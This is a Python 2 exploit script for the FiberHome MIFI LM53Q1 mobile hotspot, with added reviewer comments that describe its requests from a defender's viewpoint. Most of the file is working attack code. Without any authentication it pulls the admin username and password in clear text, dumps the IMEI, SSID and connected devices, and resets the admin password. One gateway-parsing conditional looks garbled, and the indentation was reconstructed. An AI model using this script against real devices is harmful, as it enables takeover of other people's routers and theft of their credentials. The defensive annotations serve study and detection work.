#!/usr/bin/python
# Exploit Title: FiberHome MIFI LM53Q1 Multiple Vulnerabilities
# Exploit Author: Ibad Shah
# Vendor Homepage: www.fiberhome.com
# Version: VH519R05C01S38
# Tested on: Linux
# Platform : Hardware
# CVE : CVE-2017-16885, CVE-2017-16886, CVE-2017-16887
# Greetz : Taimoor Zafar, Jawad Ahmed, Owais Mehtab, Aitezaz Mohsin, ZHC
#
# NOTE(review): this listing is Python 2 (print statements, raw_input). Line
# breaks and indentation were restored from a whitespace-collapsed copy, so
# the nesting below is a best reading; confirm it against the original file.
# Runs of spaces inside string literals may have been collapsed the same way.
# The ASCII-art banner that preceded this header is left out because its
# spacing did not survive.
#
# What the listing shows, read from the defender's side:
#   * Every request goes to /xml_action.cgi on the device's web interface and
#     carries no cookie, token or credentials; the only header set anywhere is
#     Content-Type on the POST.
#   * The target address is the client's default gateway, so the exposed
#     surface is the LAN/Wi-Fi side of the device.
#   * Where HTTP requests to the device are logged, the traces to look for are
#     requests for xml_action.cgi with file=admin or file=status1, and POSTs
#     with method=set, from clients that never authenticated.
#   * The header ties the behaviour to firmware VH519R05C01S38 and the three
#     CVE ids above; the page names no fixed version, so check the vendor's
#     advisories for those ids.

# NOTE(review): sys and getopt are imported but not used in this listing.
import requests,sys,getopt,socket,struct

#Declaring IP as our global variable to probe for Gateway IP of Device
# NOTE(review): a `global` statement at module level has no effect; `ip` is
# simply a module-level name assigned further down.
global ip

#Getting Gateway IP Address
def get_default_gateway_linux():
    """Return the default gateway from /proc/net/route as a dotted quad.

    Falls through to a bare ``return`` (None) when no row matches.
    """
    with open("/proc/net/route") as fh:
        for line in fh:
            fields = line.strip().split()
            # Keep only rows whose second column is 00000000 (the default
            # route) and whose fourth column has bit 2 set (the gateway
            # flag); the column-title row is skipped by the first test.
            if fields[1] != '00000000' or not int(fields[2 + 1], 16) & 2 if False else fields[1] != '00000000' or not int(fields[3], 16) & 2:
                continue
            # The third column is the gateway as hex; it is packed as a
            # little-endian 32-bit value, which presumably matches the host
            # byte order on the machines this was tested on.
            return socket.inet_ntoa(struct.pack("<L", int(fields[2], 16)))
    return;

# Resolved once at import time; None here makes the "http://"+ip concatenations
# below raise TypeError.
ip = get_default_gateway_linux()
exploit_title ="=============================================== \n FiberHome Remote Administrator Account Details \n================================================";

#Function to get Device Statistics
def get_device_details():
    """Fetch the status1 document and print selected device fields.

    Sends one GET with no authentication material and scans the response
    line by line for a fixed set of XML tags.
    """
    gateway = None
    hardware = None
    device_name = None
    devices_all = ''
    version = None
    gateway = None
    ssid = ''
    dns1 = None
    dns2 = None
    # NOTE(review): this URL hard-codes 192.168.8.1 instead of using the
    # module-level `ip` that the other two functions use.
    requestStatus = requests.get("http://192.168.8.1/xml_action.cgi?method=get&module=duster&file=status1")
    # Tabs are stripped and the body is split into lines; each tag is assumed
    # to sit on a line of its own, since values are extracted by deleting the
    # opening and closing tag text from that line.
    api_response = requestStatus.content.replace('\t','').split('\n')
    for results in api_response:
        if "<hardware_version>" in results:
            hardware = results.replace('<hardware_version>','').replace('</hardware_version>','').replace(' ','').replace('\n','')
        if "<device_name>" in results:
            device_name = results.replace('<device_name>','').replace('</device_name>','').replace(' ','').replace('\n','')
        if "<version_num>" in results:
            version = results.replace('<version_num>','').replace('</version_num>','').replace(' ','').replace('\n','')
        if "<gateway>" in results:
            gateway = results.replace('<gateway>','').replace('</gateway>','').replace(' ','').replace('\n','')
        if "<ssid>" in results:
            # Unlike the other fields, spaces are kept in the SSID.
            ssid = results.replace('<ssid>','').replace('</ssid>','').replace('\n','')
        if "<dns1>" in results:
            dns1 = results.replace('<dns1>','').replace('</dns1>','').replace(' ','').replace('\n','')
        if "<dns2>" in results:
            dns2 = results.replace('<dns2>','').replace('</dns2>','').replace(' ','').replace('\n','')
        if "<IMEI>" in results:
            imei = results.replace('<IMEI>','').replace('</IMEI>','').replace(' ','').replace('\n','')
            # NOTE(review): the summary is placed under the IMEI branch
            # because `imei` has no initial value; any field still None at
            # this point (tag absent, or appearing after <IMEI>) makes the
            # string concatenation raise TypeError. Confirm the nesting.
            print "\n=============================================="
            print "\nHardware Version of Device : "+hardware+"\n"
            print "\nName of Device : "+device_name+"\n"
            print "\nSoftware Version of Device : "+version+"\n"
            print "\nIMEI of Device! : "+imei+"\n"
            print "\nWiFi SSID of Device : "+ssid+"\n"
            print "\nGateway of Zong Device : "+gateway+"\n"
            print "\nDNS Primary of Device : "+dns1+"\n"
            print "\nDNS Secondary of Device : "+dns2+"\n"
            print "\n=============================================================================\n";
        if "<known_devices_list>" in results:
            devices_all = results.replace('<known_devices_list>','').replace('</known_devices_list>','').replace('\n','')
            print "\nConnected Devices to WIFI\n"
            print devices_all

#Function for getting User Account Details to login to Portal
def get_user_account_details():
    """Fetch the admin document and print the portal username and password.

    The GET carries no credentials. The code expects the response to hold
    <router_username> and <router_password> elements and prints their text
    as received, i.e. the password is read back in clear text.
    """
    request = requests.get("http://"+ip+"/xml_action.cgi?method=get&module=duster&file=admin")
    admin_details = request.content.replace('\t','').split('\n')
    for admin_login_response in admin_details:
        if "<router_username>" in admin_login_response:
            username = admin_login_response.replace('<router_username>','').replace('</router_username>','')
        if "<router_password>" in admin_login_response:
            password = admin_login_response.replace('<router_password>','').replace('</router_password>','')
            # NOTE(review): printing is placed under the password branch
            # because neither name has an initial value; it assumes the
            # username line precedes the password line. Confirm the nesting.
            print "\nUsername of Device Web Application :\n"+username+" "
            print "Password of Device Web Application :\n"+password+"\n"
            print "\n=============================================================================\n";

#Function to change Administrator Password
def change_admin_password():
    """Prompt for a password and POST it to the admin document.

    The POST carries only a Content-Type header, so the device is asked to
    change its administrator password without any proof of the current one.
    """
    set_password = raw_input("\nEnter Password to Change : ")
    password = str(set_password)
    # The typed value is concatenated into the XML body without escaping.
    xml = "<?xml version='1.0' encoding='UTF-8'?><RGW><management><router_password>"+password+"</router_password></management></RGW>"
    headers = {'Content-Type': 'application/xml'}
    # NOTE(review): the response text is stored but never inspected, so the
    # message below is printed whether or not the device accepted the change.
    change_password_request = requests.post("http://"+ip+"/xml_action.cgi?method=set&module=duster&file=admin", data=xml, headers=headers).text
    print "Password Changed!"

def main():
    """Print the banner and menu, read one option and dispatch on it."""
    print exploit_title
    print "\nSelect Menu For Fetching Details \n \n 1. Get Portal Login & Password. \n 2. Get Other Details. \n 3. Change Admin Password for Device"
    get_option = raw_input("\n Enter Option :");
    # NOTE(review): `option` is never read; the int() call only has the effect
    # of raising ValueError on non-numeric input, which also makes the
    # empty-string branch below unreachable.
    option = int(get_option)
    if get_option == "1":
        get_user_account_details()
        raw_input("\n Press Any Key To Exit");
    elif get_option == "2":
        get_device_details()
        raw_input("\n Press Any Key To Exit");
    elif get_option == "3":
        change_admin_password()
    elif get_option == "":
        print "Good Bye!";
    else:
        print "Goodbye!";

# Runs at import time; there is no __main__ guard.
main()